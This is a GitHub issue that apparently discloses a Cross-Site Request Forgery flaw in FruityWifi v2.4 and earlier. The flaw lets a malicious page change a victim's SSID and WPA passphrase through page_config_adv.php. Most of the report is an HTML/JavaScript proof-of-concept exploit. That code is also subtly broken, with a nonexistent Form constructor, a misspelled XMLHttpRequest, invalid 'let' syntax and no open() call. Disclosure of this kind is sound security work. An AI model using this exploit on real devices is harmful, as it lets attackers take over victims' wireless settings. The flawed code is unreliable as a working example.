Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Cross-Site Request Forgery in FruityWifi <=v2.4 #277

Open
harsh-bothra opened this issue Oct 2, 2020 · 0 comments
Open

Cross-Site Request Forgery in FruityWifi <=v2.4 #277

harsh-bothra opened this issue Oct 2, 2020 · 0 comments

Comments

@harsh-bothra
Copy link

Vulnerability Description

During the analysis of the product, it was observed that FruityWifi <=v2.4 is vulnerable to Cross-Site Request Forgery (CSRF) due to lack of CSRF protection in the page_config_adv.php endpoint. This allows an unauthenticated attacker to lure the victim to visit a website containing a CSRF Page resulting in the change of newSSID and hostapd_wpa_passphrase value as per the attacker's choice.

Steps to Reproduce

  1. Generate an HTML Proof of Concept with the below content.
<html>
<head>
<script>
	let url = "http://fruitywifi_ip:port/page_config_adv.php";
	let form = new Form();
	form.append("hostapd","0");
	form.append("newSSID","hack");
	form.append("hostapd_wpa_passphrase","hack");	

	let xhr = new XMlHttpRequest();
	let xhr.WithCredentials = true;
	xhr.send(form);
	
</script>
</head>
  <body>
  <h1>Hi Man</h1>
  </body>
</html>
  1. Once the victim will open this HTML file, a CSRF request will be triggered to the legitimate server allowing the change of newSSIF and hostapd_wpa_passphrase.
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
None yet
Projects
None yet
Development

No branches or pull requests

1 participant